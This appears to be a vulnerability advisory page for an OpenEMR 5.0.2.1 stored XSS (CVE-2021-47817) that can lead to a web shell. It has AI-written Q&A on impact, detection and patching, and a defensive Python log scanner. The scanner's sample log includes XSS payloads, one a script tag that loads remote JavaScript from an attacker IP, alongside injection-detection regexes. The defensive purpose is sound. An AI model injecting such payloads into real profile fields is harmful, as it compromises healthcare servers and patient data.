CVE-2021-47817
BaseFortify

Publication date: 2026-01-21

Last updated on: 2026-02-02

Assigner: VulnCheck

Description
OpenEMR 5.0.2.1 contains a cross-site scripting vulnerability that allows authenticated attackers to inject malicious JavaScript through user profile parameters. Attackers can exploit the vulnerability by crafting a malicious payload to download and execute a web shell, enabling remote command execution on the vulnerable OpenEMR instance.
Meta Information
Generated: 2026-05-07
AI Q&A generated: 2026-01-21
EPSS evaluated: 2026-05-05
Affected Vendors & Products (1 associated CPE)
Vendor: open-emr
Product: openemr
Version / Range: 5.0.2.1
CWE-79: The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.
AI Powered Q&A
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?

The vulnerability allows authenticated attackers to inject malicious JavaScript and, through it, execute commands on the OpenEMR server, potentially compromising sensitive patient data and system integrity. Such a compromise could violate data protection regulations like GDPR and HIPAA, which mandate the protection of personal health information and require that the confidentiality and integrity of patient data be maintained. Exploitation of this vulnerability could therefore negatively impact compliance with these standards by exposing protected health information to unauthorized access or manipulation. [2, 5]


Can you explain this vulnerability to me?

CVE-2021-47817 is a cross-site scripting (XSS) vulnerability in OpenEMR version 5.0.2.1 that allows authenticated attackers to inject malicious JavaScript through user profile parameters. The payload is saved in a profile field and is rendered without proper encoding, so it executes in the browser of an administrator who views that data. The XSS itself runs only in the browser; it is the administrator's privileged, authenticated session that the script abuses to download and execute a web shell on the server. That web shell then allows remote command execution on the vulnerable OpenEMR instance, effectively giving the attacker control over the server. The attack requires network access and a valid account, has low attack complexity, and needs user interaction (an administrator must open the page that renders the injected field). [2, 4]


How can this vulnerability impact me?

This vulnerability can lead to remote code execution on the OpenEMR server, allowing attackers to run arbitrary system commands. That compromises the confidentiality and integrity of sensitive patient data and can lead to full server takeover. Attackers can inject scripts that, when executed in an administrator's browser, download a PHP web shell to the server, giving them persistent unauthorized access and control over the affected system. This poses significant risks to the security and availability of healthcare data and infrastructure. [2, 4, 5]


How can this vulnerability be detected on my network or system? Can you suggest some commands?

Detection involves monitoring for unusual API requests to OpenEMR endpoints such as `/portal/patient/api/users/` and `/portal/patient/api/user/{id}`, which may indicate attempts to enumerate users or to inject malicious payloads. Inspecting HTTP requests for PUT requests that modify user profile parameters (e.g., the `lname` field) with embedded JavaScript can identify exploitation attempts; note that a standard web server access log records only the request line, so body inspection needs a reverse proxy, WAF or application-level audit log that captures request bodies. Since the exploit uses authenticated sessions, reviewing logs for unexpected authenticated API activity or unusual session initialization requests to `login.php` and `register.php` may also be useful. Specific commands are not provided in the resources, but network monitoring tools or web application firewalls can be configured to alert on these patterns. [4]
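The following script is an added example of the detection logic described above; it is not code from BaseFortify or from the OpenEMR project. It scans constructed JSON-lines request records (the format, field names and sample lines are assumptions for the example; the endpoint paths and the `lname` field come from the page) for the two patterns named: profile updates to `/portal/patient/api/user/{id}` whose name or e-mail fields carry script markers, and sources that walk the user list or several individual user records.

```python
import json
import re
import urllib.parse
from collections import Counter

# Constructed sample of request records (JSON lines), one request per line, as a
# reverse proxy or WAF audit log that captures bodies might emit them. The field
# names are an assumption for this example; adapt them to what your proxy logs.
SAMPLE_LOG = r'''
{"ts":"2026-01-21T10:00:01Z","src":"10.0.0.5","user":"portal-user-7","method":"POST","uri":"/portal/patient/index.php","body":"login=1"}
{"ts":"2026-01-21T10:00:02Z","src":"10.0.0.5","user":"portal-user-7","method":"GET","uri":"/portal/patient/api/users/","body":""}
{"ts":"2026-01-21T10:00:03Z","src":"10.0.0.5","user":"portal-user-7","method":"GET","uri":"/portal/patient/api/user/1","body":""}
{"ts":"2026-01-21T10:00:04Z","src":"10.0.0.5","user":"portal-user-7","method":"GET","uri":"/portal/patient/api/user/2","body":""}
{"ts":"2026-01-21T10:00:05Z","src":"10.0.0.5","user":"portal-user-7","method":"GET","uri":"/portal/patient/api/user/3","body":""}
{"ts":"2026-01-21T10:00:06Z","src":"10.0.0.5","user":"portal-user-7","method":"PUT","uri":"/portal/patient/api/user/7","body":"{\"fname\":\"Eve\",\"lname\":\"<script src=\\\"http://10.0.0.5/x.js\\\"></script>\"}"}
{"ts":"2026-01-21T10:01:10Z","src":"10.0.0.9","user":"portal-user-3","method":"PUT","uri":"/portal/patient/api/user/3","body":"{\"fname\":\"Ann\",\"lname\":\"O'Brien\"}"}
{"ts":"2026-01-21T10:02:00Z","src":"10.0.0.12","user":"portal-user-5","method":"PUT","uri":"/portal/patient/api/user/5","body":"{\"lname\":\"Lee\",\"email\":\"a@b.tld\\\" onmouseover=alert(1)\"}"}
'''

PROFILE_API = re.compile(r"^/portal/patient/api/user/\d+$")
USER_LIST_API = re.compile(r"^/portal/patient/api/users/?$")
PROFILE_FIELDS = ("fname", "mname", "lname", "email")
# Markers that have no business in a patient's name or e-mail field.
SCRIPT_MARKERS = re.compile(
    r"<\s*/?\s*(script|img|svg|iframe|object|embed)\b"  # tag injection
    r"|javascript\s*:"                                   # URL scheme
    r"|\bon[a-z]+\s*=",                                  # event-handler attribute
    re.I,
)


def parse_records(text):
    """Parse JSON-lines request records, skipping blank or malformed lines."""
    records = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            records.append(json.loads(line))
        except json.JSONDecodeError:
            continue
    return records


def profile_fields(body):
    """Return the profile fields from a request body (JSON or form-encoded)."""
    try:
        data = json.loads(body)
    except (json.JSONDecodeError, TypeError):
        data = dict(urllib.parse.parse_qsl(body or ""))
    if not isinstance(data, dict):
        return {}
    return {k: str(v) for k, v in data.items() if k in PROFILE_FIELDS}


def find_injection_attempts(records):
    """Flag profile updates whose name/e-mail fields carry script markers."""
    hits = []
    for rec in records:
        if rec.get("method") not in ("PUT", "POST", "PATCH"):
            continue
        if not PROFILE_API.match(rec.get("uri", "")):
            continue
        for field, value in profile_fields(rec.get("body")).items():
            m = SCRIPT_MARKERS.search(value)
            if m:
                hits.append({"ts": rec.get("ts"), "src": rec.get("src"),
                             "user": rec.get("user"), "uri": rec["uri"],
                             "field": field, "marker": m.group(0)})
    return hits


def find_enumeration(records, threshold=3):
    """Count per-source reads of the user list and individual user records.

    A portal account normally touches only its own profile; a source that lists
    users or walks several /user/{id} records is worth a look.
    """
    counts = Counter()
    for rec in records:
        uri = rec.get("uri", "")
        if rec.get("method") == "GET" and (USER_LIST_API.match(uri) or PROFILE_API.match(uri)):
            counts[rec.get("src")] += 1
    return {src: n for src, n in counts.items() if n >= threshold}


if __name__ == "__main__":
    recs = parse_records(SAMPLE_LOG)
    for hit in find_injection_attempts(recs):
        print("XSS attempt:", hit)
    for src, n in find_enumeration(recs).items():
        print(f"enumeration: {src} read {n} user records")
```

On the sample data the script flags the `lname` update carrying a `<script>` tag and the `email` value that breaks out of an attribute with an `onmouseover=` handler, and reports 10.0.0.5 for reading four user records; the legitimate `O'Brien` update is not flagged. The marker list is deliberately narrow so that names with apostrophes or `=` in them do not trip it; tune it against your own traffic before alerting on it.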


What immediate steps should I take to mitigate this vulnerability?

Immediate mitigation steps include applying the vendor's security patches, specifically upgrading OpenEMR from version 5.0.2.1 to a patched version such as 5.0.2.2 that addresses this vulnerability. Additionally, restrict access to the Patient Portal API to trusted users, enforce strong authentication, and monitor for suspicious activity. If you maintain local templates, apply output encoding to user profile parameters wherever they are rendered (e.g., PHP's htmlspecialchars() with ENT_QUOTES and an explicit UTF-8 charset, so that single-quoted attribute contexts are covered as well); this is a stopgap, not a substitute for the patch, and it only protects HTML contexts, not values placed into inline JavaScript. Disabling or restricting backup features that allow command execution until patched is also recommended. Finally, review and harden API permissions to prevent unauthorized access. [5]

